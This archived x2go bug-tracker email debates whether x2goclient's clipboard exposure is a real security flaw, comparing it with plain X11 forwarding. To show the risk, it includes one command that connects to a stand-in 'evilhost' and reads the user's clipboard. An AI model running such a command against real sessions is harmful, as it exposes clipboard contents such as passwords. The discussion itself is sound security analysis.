From snalwuer@stud.informatik.uni-erlangen.de Mon Jul 1 16:01:32 2013 Received: (at 258) by bugs.x2go.org; 1 Jul 2013 14:01:33 +0000 X-Spam-Checker-Version: SpamAssassin 3.3.2 (2011-06-06) on ymir.das-netzwerkteam.de X-Spam-Level: X-Spam-Status: No, score=0.0 required=5.0 tests=RCVD_IN_DNSWL_BLOCKED, URIBL_BLOCKED autolearn=ham version=3.3.2 Received: from faui03.informatik.uni-erlangen.de (faui03.informatik.uni-erlangen.de [131.188.30.103]) by ymir (Postfix) with ESMTPS id D43925DA79 for <258@bugs.x2go.org>; Mon, 1 Jul 2013 16:01:32 +0200 (CEST) Received: from faui0sr0.informatik.uni-erlangen.de (faui0sr0.informatik.uni-erlangen.de [131.188.30.90]) by faui03.informatik.uni-erlangen.de (Postfix) with ESMTP id 7473468098D; Mon, 1 Jul 2013 16:01:32 +0200 (CEST) Received: by faui0sr0.informatik.uni-erlangen.de (Postfix, from userid 31763) id 6B33BB28316; Mon, 1 Jul 2013 16:01:32 +0200 (CEST) Date: Mon, 1 Jul 2013 16:01:32 +0200 From: Alexander Wuerstlein To: Christoph Anton Mitterer , 258@bugs.x2go.org Subject: Re: [X2Go-Dev] Bug#258: Bug#258: SECURITY: x2goclient allows clipboard sniffing Message-ID: <20130701140132.GQ2447@cip.informatik.uni-erlangen.de> References: <1372646308.18508.2.camel@heisenberg.scientia.net> <20130701114356.GP2447@cip.informatik.uni-erlangen.de> <1372682609.25918.14.camel@heisenberg.scientia.net> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <1372682609.25918.14.camel@heisenberg.scientia.net> X-Echelon-Scan: plutonium bomb osama revenge dirty allah satan iran victory dimona cocaine guantanamo centrifuge holy war pigs mossad nsa X-Echelon-Result: Belligerent User-Agent: Mutt/1.5.21 (2010-09-15) On 13-07-01 15:03, Christoph Anton Mitterer wrote: > On Mon, 2013-07-01 at 13:43 +0200, Alexander Wuerstlein wrote: > > Yes, other related tools like X11. x2go is basically just a faster > > version of the traditional xforwarding. In X11 every client can always > > access the clipboard/selection/etc., so you will also have the same > > security problems (by design). E.g. 'ssh -X user@evilhost "xclip -o"' > > demonstrates this. > Well but that "argument" doesn't really count: > 1) Just because others do it plainly insecure, you cannot do it like > this as well... like as if Gentoo would say "if Debian breaks their > OpenSSL entropy, we should do so, too"... o.O It isn't like that at all, X11 clients and servers have to comply with the respective parts of the protocol. If the protocol demands insecure behaviour, its a design bug, or maybe, like in this case, a compromise nobody likes: Since in X11 clients handle all the shortcuts and mouse button events, since clients or toolkits handle the widgets, the only option to implement C&P is to have clients ask the server for the clipboard or selection contents. Its more a "there is no other way to do it except to make it unusable" kind of problem imho. > 2) Literally no one who has a decent mind of security, will allow other > hosts do directly access their X server.. because then you're (security > wise) anyway screwed... I'm not only talking about 'xhost +' and the like, this would of course be a major problem for more reasons than only the clipboard. And if you wouldn't trust a host with 'ssh -X', then you also shouldn't trust it with x2go. Just think of x2go as a variant of 'ssh -X' with image compression and some extras. X11 protocol firewalling is not really one of those extras. And since the x2goclient will always run in your local X session, it will always be able to read your clipboard. > And I thought NX would secure what's sent from remote in order to not > being able to overtake the input/output devices of the hosts (whole) > Xserver). In a way, yes. Afaik you can avoid certain attacks of the "I'll attach to the root window and get all key events" kind since windowed x2go sessions give you a separate root window. But I imagine there are more problems out there nobody thought of yet. Ciao, Alexander Wuerstlein.